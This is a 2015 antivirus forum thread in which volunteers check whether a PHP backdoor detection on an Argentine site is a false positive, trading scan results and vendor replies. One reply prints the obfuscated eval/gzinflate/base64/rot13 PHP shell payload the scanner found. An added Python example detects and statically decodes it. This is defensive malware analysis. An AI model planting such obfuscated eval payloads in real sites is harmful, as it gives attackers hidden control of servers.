Topic: Need to check if some URL have a false positive (Read 3703 times)

REDACTED

  • Guest
Need to check if some URL have a false positive
« on: September 05, 2015, 12:29:30 AM »
Can anybody check the following in order to check for a false positive.

URL: http://www.psa.com.ar/usuarios/novedades
Infection: PHP:BackDoor-CB [Trj]
Process: C:\Program Files\Google\Chrome\Application\chrome.exe

Regards,
Gustavo Oga
Buenos Aires
Argentina

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34051
  • malware fighter
Re: Need to check if some URL have a false positive
« Reply #2 on: September 05, 2015, 12:42:10 AM »
Do a Quttera scan and you will see the PHP malware.
-/usuarios/novedades
Severity:   Malicious
Reason:   Detected malicious PHP content
Details:   Detected malicious PHP content
Offset:   15914
Code:
[[eval (gzinflate(base64_decode(str_rot13("ML/EF8ZjRZnsUrk/hVMOJaQZS19pZ3kkVNtX06qEFgnxAct0bH2RGin/zljgT/c2q9^^/iih+BI40TaSguWq98TXxc4k0pOiufqT+K7WvibboK8kxCfTyZ6IddrWcAV5mKhyANXlg0FkNPkJ2wTHUTrlQtoJHUjjyFGycunTqKtI8lnvzPLRJ^^DT6ZEPUoIKJWkYyewYRFaJxt+epn6S0qs39+umDuTfsEJnSmd3HRWTkCv/WgX54K4g98833KBSUHXv/Ygqsr+k4USOENPRjxM/ZkaAk56eYDM0xJ5^^sK552h1khNHKr2lIXpZOhYvSs2VHZh8O8oKbPibYUutxFLYKpCY2KCo8Y7ByDy6D0l8="))));]]
Reported to Avast, so no FP.
Vuln.: -http://www.domxssscanner.com/scan?url=http%3A%2F%2Fwww.psa.com.ar -> -: //s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5303bb29505f7875 etc.
uMatrix has prevented the following page from loading:
-http://s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5303bb29505f7875

polonus
« Last Edit: September 05, 2015, 12:47:29 AM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline jefferson sant

  • Starting Graphoman
  • *
  • Posts: 6669
  • volunteer
Re: Need to check if some URL have a false positive
« Reply #3 on: September 05, 2015, 01:12:02 AM »
When trying to access the home page I received another Avast notification; a moment later it did not show any more.

hxxp: //www.psa.com.ar/ JS:includer-BIW [Trj]

see the screenshot attached.
« Last Edit: September 06, 2015, 04:54:01 AM by jefferson sant »

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34051
  • malware fighter
Re: Need to check if some URL have a false positive
« Reply #4 on: September 05, 2015, 11:52:58 AM »
Hi jefferson sant,

That is what Avast detects there, and only 2 AVs detect this. Detection has been found to be FP-prone, so we have to establish that we see real malicious code here.
I also found traces of adblock-circumventing code, so there might be a reason for it to be flagged.
Another example of a similar detection was seen here: https://api.vtapi.net/hu/file/6d2f3a59492223018e34c219832936457634a0220bab861d29bc3ffb55aeacf1/analysis/

The PHP malcode Quttera came up with is being discussed here: https://www.byte.nl/blog/analysis-of-http-posted-php-malware
Where Avast also blocks: http://ddecode.com/phpdecoder/?results=Backdoor -CB[Trj] for the deobfuscation. *
At various analysis sites I get the same Avast result.

* PHP Syntax Check: Parse error: syntax error, unexpected ';', expecting ']' in your code on line 1

polonus (volunteer website security analyst and website error-hunter)


Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37698
Re: Need to check if some URL have a false positive
« Reply #5 on: September 05, 2015, 08:28:42 PM »
novedades.htm
https://www.virustotal.com/nb/file/eec5e6e5cee497b13c467684ad36217fbc294860fe0fa39a44179901bb550dc2/analysis/1441477265/


Message from F-Secure lab
==============================================
The file you submitted is clean. It is not malicious. No detection needed.
==============================================
Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34051
  • malware fighter
Re: Need to check if some URL have a false positive
« Reply #6 on: September 05, 2015, 10:03:50 PM »
I am still stuck with this report; the code won't go away.
Re: http://quttera.com/detailed_report/www.psa.com.ar
I get Redirections:
HTTP Status Code: 500 Server Unavailable
Content Size: 0 bytes
Content Type: no/content
IP Address: 200.16.135.151
Country: Argentina
Web Server:
Netcraft does not like that IP: http://toolbar.netcraft.com/site_report?url=http://200.16.135.151
a meagre 4/100 green...

polonus
Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34051
  • malware fighter
Re: Need to check if some URL have a false positive
« Reply #8 on: September 06, 2015, 12:57:36 AM »
Hi Pondus,

But here is the same PHP shell code, which is flagged the same by Avast: -https://www.google.pl/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&cad=rja&uact=8&ved=0CEkQFjAFahUKEwiek8a-_uDHAhXGWhQKHRSfAJM&url=http%3A%2F%2Fwww.pakteenleets.net%2F2014%2F10%2Fsmall-upload-shell-php.html&usg=AFQjCNGPqwdFdrSRs-T3i7zxmpyU0rR9hg
Exactly what Quttera gives under view code!

Or the gzinflate recursively coded PHP shell must be benign - a FP on the compressed rot13 code?

pol
« Last Edit: September 06, 2015, 01:01:07 AM by polonus »

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37698
Re: Need to check if some URL have a false positive
« Reply #9 on: September 06, 2015, 10:11:26 PM »
And that one is detected:
https://www.virustotal.com/nb/file/e05fc0d660252ed3b76fdba22db0c723677f7c11da54c77297a4280091286752/analysis/1441570049/

There is a slight difference at the beginning and end of the code.
Code:
sample 1 = [[eval    and end with  "))));]]
sample 2 = <?php eval  and end with  ")))); ?>


EDIT: after looking closer there are also some minor code changes in the middle of the code.
If the code was exactly identical, shouldn't the MD5 be the same?

« Last Edit: September 06, 2015, 10:43:21 PM by Pondus »
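As an added, defender-side example (not code from the thread or from any of the posters): a small static scanner that spots the eval(gzinflate(base64_decode(str_rot13(...)))) chain Quttera reported, peels the three layers without executing anything, and hashes only the inner payload. It shows why Pondus's two samples have different file MD5s yet carry the same payload; the samples and the inner string are constructed here, not taken from the site.

```python
import base64
import codecs
import hashlib
import re
import zlib

# Decoder chain from the thread's snippet: eval(gzinflate(base64_decode(str_rot13("..."))))
CHAIN_RE = re.compile(
    r'eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*str_rot13\s*\(\s*"([^"]+)"',
    re.IGNORECASE,
)


def build_payload(plain: str) -> str:
    """Encode text the way the chain expects (rot13 of base64 of raw deflate).
    Used here only to construct test samples with a known, benign inner string."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)  # -15 = raw deflate, what gzinflate() reads
    raw = comp.compress(plain.encode()) + comp.flush()
    return codecs.encode(base64.b64encode(raw).decode(), "rot_13")


def find_chain_payload(source: str):
    """Return the quoted payload literal if the decoder chain is present, else None."""
    m = CHAIN_RE.search(source)
    return m.group(1) if m else None


def peel_static(payload: str) -> str:
    """Undo str_rot13 -> base64_decode -> gzinflate without ever eval'ing the result."""
    raw = base64.b64decode(codecs.encode(payload, "rot_13"))
    return zlib.decompress(raw, -15).decode("utf-8", "replace")


def payload_fingerprint(source: str):
    """SHA-256 of the inner payload only, so wrapper differences do not change it."""
    payload = find_chain_payload(source)
    return hashlib.sha256(payload.encode()).hexdigest() if payload else None


def file_md5(source: str) -> str:
    """Whole-file MD5, the hash a VirusTotal-style lookup keys on."""
    return hashlib.md5(source.encode()).hexdigest()


# Constructed samples: the same payload in the two wrappers Pondus describes,
# "[[eval ... ))));]]" versus "<?php eval ... )))); ?>", plus a clean file.
INNER = "echo 'constructed benign payload';"
PAYLOAD = build_payload(INNER)
SAMPLE_1 = '[[eval (gzinflate(base64_decode(str_rot13("%s"))));]]' % PAYLOAD
SAMPLE_2 = '<?php eval(gzinflate(base64_decode(str_rot13("%s")))); ?>' % PAYLOAD
CLEAN = "<?php echo date('Y'); ?>"
```

Running the functions over SAMPLE_1 and SAMPLE_2 gives two different file MD5s but one identical payload fingerprint, which is the check to run before calling a differing hash a different file.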

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37698
Re: Need to check if some URL have a false positive
« Reply #10 on: September 07, 2015, 07:48:45 AM »
Message from BlueCoat lab ....

The one sample that was detected got an auto-added signature when I uploaded it.

========================================================================================
For your kind information, the undetected sample has the same characteristics and behavior with the detected script. Therefore, detections
have been added for both samples.
========================================================================================